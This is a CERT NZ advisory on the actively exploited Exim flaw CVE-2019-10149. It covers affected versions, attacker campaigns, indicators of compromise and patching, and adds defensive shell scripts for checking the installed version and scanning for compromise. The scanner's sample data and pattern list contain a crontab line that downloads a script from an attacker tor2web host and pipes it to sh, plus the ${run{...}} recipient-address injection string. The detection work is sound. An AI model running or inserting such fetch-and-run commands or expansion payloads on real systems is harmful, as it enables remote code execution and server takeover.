4:25pm, 17 June 2019
Exim mail transfer agent (MTA) vulnerability being exploited
CERT NZ is aware of a vulnerability in the Exim Mail Transfer Agent (MTA) software that is being actively exploited by at least two separate groups. Exim is widely used: according to ZDNet, it is thought to be running on over 50% of the mail servers on the internet.
The vulnerability, CVE-2019-10149, nicknamed "Return of the WIZard", lets an attacker run arbitrary system commands with the privileges of the Exim process, which on most servers is root. The flaw lies in how Exim handles recipient addresses: a crafted local part containing an ${run{...}} string expansion is passed through Exim's expansion engine, which executes the embedded command.
Both known campaigns have been observed dropping malware, establishing backdoor access, and installing cryptocurrency miners on compromised Exim servers.
What's happening
Systems affected
The vulnerability affects versions 4.87 to 4.91 of Exim. It is being exploited by at least two separate groups.
What this means
Security researchers have identified two different attacker groups exploiting this vulnerability. The attacks are similar in nature: both download scripts from attacker-controlled servers and run them on the target system. The scripts and their download locations have changed over time, which indicates the groups are still developing their attacks.
One group has used the vulnerability to download a shell script to the mail server that adds an SSH key to the root account. This campaign also includes a self-spreading worm component that uses the same Exim exploit against other vulnerable Exim servers. The attackers also downloaded and installed a cryptocurrency miner on compromised servers.
What to look for
How to tell if you're at risk
If you are running versions 4.87 to 4.91 (inclusive) of the Exim mail transfer agent (MTA) software, you are affected by this vulnerability. Versions earlier than 4.87 are also vulnerable if they were built with EXPERIMENTAL_EVENT enabled, which is not the default.
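The version check in script form, as an added example that is not part of CERT NZ's advisory: it parses the first line of `exim -bV` (on Debian and Ubuntu the binary is `exim4`) and reports whether the number falls in 4.87 to 4.91. The `--check` flag, the function names and the file name are this example's own choices. Because distributions that backport the fix keep the old version number, a hit means "confirm against the package changelog", not "confirmed vulnerable".

```shell
#!/bin/sh
# Added example, not CERT NZ's code: classify an Exim version as inside or
# outside the affected 4.87-4.91 range, reading the version from `exim -bV`.
# Caveat: distributions that backported the fix keep the old version number,
# so "in range" means "check the package changelog", not "confirmed vulnerable".

# Extract the version number from `exim -bV` output on stdin. The first line
# looks like "Exim version 4.91 #1 built 10-Apr-2018 10:11:54".
exim_version_from_bv() {
    awk 'NR == 1 && $1 == "Exim" && $2 == "version" { print $3; exit }'
}

# Exit 0 if the version is within 4.87..4.91 inclusive, 1 if outside, 2 if the
# string is not a version. Suffixes such as "4.92_RC1" or "4.91-3" are ignored.
exim_version_in_affected_range() {
    ver="$1"
    major="${ver%%.*}"
    rest="${ver#*.}"
    minor="${rest%%[!0-9]*}"
    case "$major:$minor" in
        :*|*:|*[!0-9:]*) return 2 ;;
    esac
    [ "$major" -eq 4 ] && [ "$minor" -ge 87 ] && [ "$minor" -le 91 ]
}

# Find the installed binary (Debian and Ubuntu ship it as exim4) and print its
# version; print nothing and return 1 if no binary is on PATH.
installed_exim_version() {
    for bin in exim exim4; do
        if command -v "$bin" >/dev/null 2>&1; then
            "$bin" -bV 2>/dev/null | exim_version_from_bv
            return 0
        fi
    done
    return 1
}

# Live check of this host: sh exim_version_check.sh --check
if [ "${1:-}" = "--check" ]; then
    ver=$(installed_exim_version)
    if [ -z "$ver" ]; then
        echo "no exim or exim4 binary found on PATH" >&2
        exit 2
    fi
    if exim_version_in_affected_range "$ver"; then
        echo "Exim $ver is in the affected range 4.87-4.91; verify whether the distribution backported the CVE-2019-10149 fix"
        exit 1
    fi
    echo "Exim $ver is outside the affected range"
fi
```

Run it with `--check` on each mail server; an exit status of 1 flags a version in the affected range, 2 means no Exim binary was found. The parsing is deliberately separate from the live probe so the range logic can be exercised against version strings without Exim installed.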
How to tell if you're affected
At the time of this advisory, CERT NZ are aware of the following indicators of compromise:
- Look for any unfamiliar cron jobs in your crontabs and remove them if they are not part of expected system operation. Because one campaign also installs an SSH key for root, check ~root/.ssh/authorized_keys for keys you did not add.
- Check your firewall and access logs for the following IP address and hostnames:
  - 173.212.214.137
  - https://an7kmd2wp4xo7hpr.tor2web.su
  - https://an7kmd2wp4xo7hpr.tor2web.io
  - https://an7kmd2wp4xo7hpr.onion.sh
Cybereason's blog post includes additional indicators of compromise.
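A scanner for the indicators above, as an added example rather than code from the advisory or from Cybereason. It greps crontabs and Exim logs for the IP address and hostnames listed, and additionally for the literal string `${run{`, which is how the exploit smuggles its command into the recipient address that a vulnerable Exim passes through string expansion. The sample log and crontab lines are constructed for the demonstration, and the log paths and the `--check` flag are this example's assumptions for common Debian and RHEL layouts.

```shell
#!/bin/sh
# Added example, not CERT NZ's code: grep crontabs and mail/firewall logs for
# the indicators in this advisory, plus the "${run{" string that the in-the-wild
# exploits embed in the RCPT TO address to trigger the vulnerable expansion.

# Indicators, one per line. Hostnames are listed without the https:// scheme so
# they also match DNS, proxy and netflow logs. Matched as fixed strings (grep -F).
EXIM_IOC_PATTERNS='173.212.214.137
an7kmd2wp4xo7hpr.tor2web.su
an7kmd2wp4xo7hpr.tor2web.io
an7kmd2wp4xo7hpr.onion.sh
${run{'

# Print every matching line as file:line:content. Exit 0 if anything matched,
# 1 if nothing did. Missing or unreadable files are skipped, so shell globs
# that do not expand are harmless.
scan_for_exim_iocs() {
    patfile=$(mktemp) || return 2
    printf '%s\n' "$EXIM_IOC_PATTERNS" > "$patfile"
    found=1
    for f in "$@"; do
        [ -f "$f" ] && [ -r "$f" ] || continue
        grep -F -n -H -f "$patfile" "$f" && found=0
    done
    rm -f "$patfile"
    return "$found"
}

# Number of matching lines across the given files, on stdout.
count_ioc_hits() {
    scan_for_exim_iocs "$@" | wc -l | tr -d ' '
}

# Constructed sample data (not real captured logs) so the scanner can be tried
# offline: one clean delivery, one rejected RCPT carrying the expansion payload
# from the advisory's IP, and a crontab entry pulling a script from a tor2web host.
make_sample_files() {
    dir=$(mktemp -d) || return 1
    cat > "$dir/mainlog" <<'EOF'
2019-06-10 04:12:55 1hZzTz-0004DK-Ll <= alice@example.com H=(mail.example.net) [198.51.100.7] P=esmtp S=410
2019-06-10 04:13:02 H=(localhost) [173.212.214.137] F=<root@localhost> rejected RCPT <${run{x}}@localhost>: relay not permitted
2019-06-10 04:13:40 1hZzUf-0004DM-4x => bob <bob@example.com> R=local_user T=local_delivery
EOF
    cat > "$dir/root.crontab" <<'EOF'
17 * * * * /usr/bin/find /tmp -type f -mtime +7 -delete
* * * * * curl -fsSL https://an7kmd2wp4xo7hpr.tor2web.su/cron.sh | sh
EOF
    printf '%s\n' "$dir"
}

# Live check of this host (run as root so the spool crontabs are readable):
#   sh exim_ioc_scan.sh --check
# Paths cover Debian/Ubuntu (exim4) and RHEL-style layouts; add your own logs.
if [ "${1:-}" = "--check" ]; then
    scan_for_exim_iocs /etc/crontab /etc/cron.d/* /var/spool/cron/* \
        /var/spool/cron/crontabs/* \
        /var/log/exim4/mainlog /var/log/exim4/rejectlog \
        /var/log/exim_mainlog /var/log/exim_rejectlog
fi
```

A zero exit status from `--check` means at least one line matched and should be read as "this host has probably been compromised", not merely "remove the cron job": the script printed the file and line so the entry can be preserved for forensics before remediation. Add firewall or proxy exports to the file list to cover the network-side indicators.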
What to do
Prevention
Upgrade to Exim 4.92, the most recent release at the time of this advisory, or later.
Note that some Linux distributions have backported the fix to older version numbers, so the version string alone will not show whether a server is patched; check the package changelog on each server to confirm the update has been applied.
Mitigation
Operating system controls such as SELinux or AppArmor can be used to limit the impact of a successful attack. When correctly implemented, these controls restrict the files, capabilities and programs the Exim process can access, so a command run through this vulnerability cannot, for example, write to root's authorized_keys or install a cron job.
More information
ZDNet article about the Return of the WIZard vulnerability and its exploits
Microsoft TechNet blog about Exim implications for Azure
If you require more information or further support, submit a report on our website or contact us on 0800 CERT NZ (0800 2378 69).
For media enquiries, email our media desk at certmedia@cert.govt.nz or call on 021 854 384